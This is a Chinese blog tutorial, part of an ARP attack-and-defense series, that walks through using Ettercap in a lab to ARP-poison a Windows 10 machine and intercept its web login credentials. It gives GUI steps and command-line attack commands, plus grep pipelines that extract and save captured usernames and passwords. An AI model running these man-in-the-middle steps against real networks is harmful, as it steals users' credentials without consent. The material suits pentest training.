ARP渗透与攻防(五)之Ettercap劫持用户流量

最新推荐文章于 2024-07-25 09:02:31 发布
最新推荐文章于 2024-07-25 09:02:31 发布
阅读量3.2k 收藏 20
点赞数 5
分类专栏: ARP渗透与攻防 文章标签: 网络 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/128754817
版权

ARP-Ettercap劫持用户流量

系列文章

ARP渗透与攻防(一)之ARP原理
ARP渗透与攻防(二)之断网攻击
ARP渗透与攻防(三)之流量分析
ARP渗透与攻防(四)之WireShark截获用户数据

一.ettercap 工具介绍

项目官网:http://ettercap.github.io/ettercap/index.html

EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。

ettercap几乎是每个渗透测试人员必备的工具之一。

二.ARP截获用户信息攻击步骤

环境准备

kali 作为ARP攻击机,IP地址:192.168.110.12

win10 作为被攻击方,IP地址:192.168.110.11

网关(路由器),IP地址:192.168.110.1

1.启动ettercap
ettercap -G

在这里插入图片描述

2.点击右上角的对勾开始扫描

在这里插入图片描述

3.点击左上角查看主机列表

在这里插入图片描述

4.选择网关 点击底部的 Add to Target 1

在这里插入图片描述

5.选择被攻击的靶机加入到target2

在这里插入图片描述

6.点击右上角攻击菜单,选择ARP攻击

在这里插入图片描述

7.点击ok发起攻击

在这里插入图片描述

8.查看此时靶机的arp列表
arp -a| findstr 192.168.110.1

在这里插入图片描述

8.查看kali的mac地址
ip a

在这里插入图片描述
可以看到现在靶机上arp表里的网关的MAC地址已经被替换为了kali的MAC地址,我们的靶机已经被毒化了。

10.靶机登录网站

在这里插入图片描述

11.kali截获用户流量,获取账号密码

在这里插入图片描述

12.停止攻击

在这里插入图片描述

三.Ettercap 软件功能介绍

1.启动界面

在这里插入图片描述

Sniffing at startup :开启嗅探模式

Primary interface :选择网卡

Bridged sniffing :是否开启桥接模式

Bridged interface :桥接模式下的网卡

配置完成后,我们点上方的✔即可完成配置。

在这里插入图片描述

2.中间人攻击菜单

在这里插入图片描述

ARP poisoning :ARP攻击

DNP poisoning :DNP攻击

ICMP redirect :icmp重定向

Port stealing :端口欺骗

DHCP spoofing :DHCP欺骗

stop MITM :停止攻击

SSL intercept :ssl嗅探

3.更多选项

在这里插入图片描述

Targets:攻击列表

Hosts:显示主机列表

Filters:载入二进制脚本

Plugins:插件

Logging:日志

4.hosts选项

在这里插入图片描述

Hosts list:扫描到的主机列表

Enable ipv6 scan:扫描ipv6地址

Scan for hosts:扫描主机列表

load hosts form file:从外部文件载入主机列表

Save hosts to file:保存主机列表到文件

5.Targets选项

在这里插入图片描述

Current targets:正在攻击的列表

Select targets::选择攻击列表

Portocol:攻击协议

Reverse matching:匹配规则

Wipe targets:擦除攻击

6.View选项

在这里插入图片描述

Connections:连接信息

Profiles:IP地址信息

Statistics:统计信息

四.命令行运行Ettercap

1.运行命令讲解
ettercap –i –eth0 –Tq –M arp:remote/ip(host)//net gatemask/ >>b.txt
T:指的是text文本模式
q:指的是安静模式执行这个命令
i:后面跟的是连接局域网的网卡
M:后面跟的是指定使用arp的方式
>>:输出文件
2.攻击命令
ettercap -Tq -i eth0  -M arp:remote /192.168.110.1// /192.168.110.11// >>b.txt

在这里插入图片描述

3.靶机登录后台网站

在这里插入图片描述

4.查看攻击界面日志
cat b.txt

在这里插入图片描述在这里插入图片描述

5.过滤无用信息,只查看用户的登录信息
tail -f b.txt | grep "USER" 
或者
tail -f b.txt | grep "CONTENT" 
或者
tail -f b.txt | egrep "USER|CONTENT"

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

6.停止ARP攻击
CTRL+C
7.分析日志
cat b.txt
8.筛选用户的登录信息
cat b.txt | grep "USER" 
或者
cat b.txt | grep "CONTENT" 
或者
cat b.txt | egrep "USER|CONTENT"
9.收集保存用户信息文件
cat -n  b.txt | egrep "USER|CONTENT" >arp.log
-n:添加行号
egrep:过滤规则
>:输出文件
怰月
关注
专栏目录
网络-ARP协议详解与ARP欺骗(中毒)攻击实战_arp中毒,干货来袭
m0_74918915的博客
04-21 918
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透安全服务、安全分析等岗位;腾讯电脑管家、360、彩影等都可以,一般就是软件上面有个按钮,点击一下即可,博主这些都没安装,就“裸奔”呢,就不做演示了。----------------2020年12月18日更新----------------
20222928 2022-2023-2 《网络攻防实践》实践四报告
qq_43791615的博客
03-29 946
20222928 2022-2023-2 《网络攻防实践》实践四报告
arp域名劫持
06-27
========================================== NetFuke Ver1.0.7 Build[Mar 13 2010] powered by shadow 2009 ========================================== {嗅探配置} ARP欺骗: [√] ICMP欺骗: [×] 混杂模式: [√] 回显缓冲: [×:5 M] 过滤器: [√] 分析器: [×] 修改器: [√] 转发模式: [主动转发] 网卡索引: [0] 本机IP: [192.168.44.44] 本机MAC: [D02788EBDB60] 【ARP欺骗配置】 欺骗模式: [S→M→D] 目标IP: [192.168.44.138] 目标MAC: [D02788EBDE64] 来源IP: [192.168.44.1] 来源MAC: [000FE27FD652] 中间人IP: [192.168.44.44] 中间人MAC: [000FE27FD652] ========================================== >>>>>NetFukeing......
流量劫持】SSLStrip 终极版 —— location 瞒天过海
weixin_33875839的博客
11-09 401
前言 之前介绍了 HTTPS 前端劫持 的方案,虽然很有趣,然而现实却并不理想。其唯一、也是最大的缺陷,就是无法阻止脚本跳转。若是没有这个缺陷,那就非常完美了 —— 当然也就没有必要写这篇文章了。 说到底,还是因为无法重写 location 这个对象 —— 它是脚本跳转的唯一渠道。尽管也流传一些 Hack 能勉强实现,但终究是不靠谱的。 事实上,在最近封稿的 HTML5 标准里,已非常明确了 lo...
一款网络抓包嗅探工具Ettercap(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
07-25 626
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
ARP劫持攻击
weixin_34221773的博客
03-05 409
今天下午,莫名其妙的产生。 部分客户的网站产生乱码,但本机访问或是好好的。 外网访问,乱码的原文件是一个<IFRAME>网页。 听说,有时ARP攻击是导致网络中断或时断时续。 安全狗和360都会有提示的。 学到的经验有两个: 一,及时防止的办法是将ARP的网关MAC地址由动态更新改为静态绑定。 二,要学会如何通过IP或MAC地址寻找攻击根源。 http://lnfs.1...
利用SSLsplit+arpspoof 实现ARP欺骗劫持流量
m0_63253040的博客
08-17 794
即在中间监听获取网络数据以便获取的有价值的信息实现攻击破坏的目的,即client-mid man-server,此处介绍的sslsplit可以作为mid man监听ssl信息及HTTP信息。http不做介绍仅仅实现代理功能,ssl实现代理的同时要与服务器建立连接,同时伪造证书与客户端建立连接,即双连接,依据获取的client信息再与服务器通信,从而实现明文数据监听。开启路由转发,我们才能把劫持到的目标机的流量请求发送给网关,使目标机能上网,不开启的话目标机无法上网,可以达到断网的目的。...
Kali Linux之ARP欺骗和DNS劫持
m0re's blog
03-14 2717
前言 哇,想想一个月之前,小煤球学长给我说知不知道ARP欺骗,然后让我有空学一下,结果拖到现在,也差不多一个多月了,现在才有空看一下。学习一下…… 什么是ARP欺骗? 前置工具 kali中的arpspoof 直接安装dsniff //root用户使用 apt-get install dsniff //普通用户使用 sudo apt-get install dsniff dsniff中含有arpspoof,urlsnarf 本地靶机实现 首先要知道目标主机的IP地址和网关,这里以win7作为受害者机器, 前
局域网ARP欺骗实战:MitM攻击与防护策略
ARP协议的工作原理是通过广播的方式向局域网中的所有设备询问目标IP地址对应的MAC地址,目标设备收到请求后会回复自己的MAC地址,从而建立IP地址与MAC地址之间的映射关系。 ## 1.2 ARP欺骗攻击原理解析 ARP欺骗...
20221902 2022-2023-2 《网络攻防实践》第四次作业
xiannvyeye的博客
03-23 554
ARP(Address Resolution Protocol)即地址解析协议,是一种将IP地址转化成物理地址的协议。不管网络层使用什么协议,在网络链路上传送数据帧时,最终还是必须使用硬件地址的。ARP欺骗原理则是通过发送欺骗性的ARP数据包致使接收者收到数据包后更新其ARP缓存表,从而建立错误的IP与MAC对应关系,源主机发送数据时数据便不能被正确地址接收。如果虚假报文的MAC是伪造的不存在的,实现ARP攻击,结果为中断通信/断网!
20211915 2022-2023-2 《网络攻击防护》实验四
ashoreG的博客
03-29 551
网络攻防第四次实验
ARP域名劫持工具
09-20
此工具用于局域网的ARP劫持攻击,比较好用的一款工具。
知名软件ADSafe暗藏恶意代码 从众多网站劫持流量
douya0012的博客
01-05 705
一、 概述 日前,火绒安全团队发现“ADSafe净网大师”、“清网卫士”、 “广告过滤大师”等多款知名软件暗藏恶意代码,偷偷劫持用户流量。这些软件出自同一公司,功能类似,主要是屏蔽网页广告。根据技术分析,三款软件都会通过替换计费名(不同网站和上游分成的标识)的方式来劫持流量,牟取暴利。其劫持网站数量为近年最多,已达50余家,包括国内多家知名导航站、电商以及在线消费交易平台等。更可怕的是,“ADSafe”劫持规则可随时通过远程操作被修改,不排除其将来用来执行其他恶意行为的可能性,存在极大安全隐患。 火绒安全
ARP劫持攻击(实验寒假补)
xiaoka__的博客
12-14 4272
1.防范ARP攻击的方法: 防范方法写在最前面 1.静态绑定(ip和Mac地址) cmd下arp -s命令: arp -s ip地址 Mac地址 2.安装ARP防火墙 如金山防火墙,彩影防火墙等。 2.ARP全称Address Resolution Protocol(地址解析协议) 3.ARP协议(地址解析协议的功能): 主机在发送数据之前将目标ip转换为MAC地址,完成网络地址到物理地址的映射,以保证两台主机之间能正常通信。 重点:必须知道MAC地址才能通信,只知道IP地址不行。 4.原理: 局域网内每
流量劫持技术2
weixin_34015336的博客
01-14 446
流量威胁分析方案,是针对目前APT分析发现困难的问题。运用大数据处理的相关技术,提供对较长时间跨度的海量网络流量数据进行挖掘分析的能力;结合机器学习、规则检测、沙箱检测、情报分析等多种威胁检测手段,依据攻击链模型对威胁行为进行关联,构建出一套较为完善的APT检测体系,使得较大时间跨度的APT攻击检测成为可能。 全流量分析的架构与过程 这是我们的全流量分析方案整体架构,流量威胁的分...
kali下arp欺骗session会话劫持
赵一舟的博客
02-08 4293
基于arp欺骗的session劫持 开启ettercap arp监听后 开启打开一个终端,输入driftnet -i wlan0 测试下arp欺骗正常没 TcpDump可以将网络中传送的数据包完全截获下来提供分析 捕获数据包命令,重新开启命令行 tcpdump -i wlan0 -w text1.cap 让受害者打开个邮箱或者微博等,登陆成功后停止tcpdump,然后在
基于arp欺骗的端口劫持工具(sport) 和会话修改工具(arspoof)
djbjh55539的博客
11-17 269
原创]基于arp欺骗的端口劫持工具(sport) 和会话修改工具(arspoof) [原创]基于arp欺骗的端口劫持工具(sport) 和会话修改工具(arspoof) 第一个: sport.exe适应环境:Lan + Switchsport.exe (VC++ 6.0 && Winpcap 3.1 && UPX Release) 17KB ARP ...
网络安全—Kali Linux之ARP欺骗和DNS劫持
Jay
03-08 1162
其应对方法只有使用HTTPS,但并不仅仅是在原有的域名HTTP的基础上切换HTTPS那么简单,还需要保障这个域名不支持HTTP访问并且没有被大范围使用HTTP访问过,如果不这样做的话会出现一个问题,运营商在DNS解析的时候并不知道这个域名是用什么协议访问的,当之前已经记录过这个域名支持HTTP访问后,不管后续是否是HTTPS访问,都会进行DNS劫持,这是如果使用的是HTTPS访问,会因为运营商的缓存服务器没有对应的SSL证书而导致请求无法建立链接,这时就会遇到请求失败的问题。(地址解析协议)的缩写。
Ettercaparp***方法
weixin_34242819的博客
03-11 166
Ettercap是kali linux集成的一款用于局域网嗅探***的工具,有人性化的图形化界面,又有丰富的命令,过滤脚步编写简单,非常适合局域网***以及wife下的中间人***。具有局域网中主机的arp欺骗,交换机的arp欺骗,可进行嗅探获取信息,也可以进行过滤篡改信息。下面是从网上收集的一些资料,供参考。Ettercap有两种运行方式,UNIFIED和BRIDGED。其...
ARP渗透技术与防御策略全套教程
资源摘要信息:"ARP渗透与防御课程视频教程.zip" 本压缩包文件包含了关于ARP(地址解析协议)渗透与防御的详细课程视频教程,适合对网络安全感兴趣的IT专业人士和学生深入学习ARP相关的攻击手段和防御策略。以下是该...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值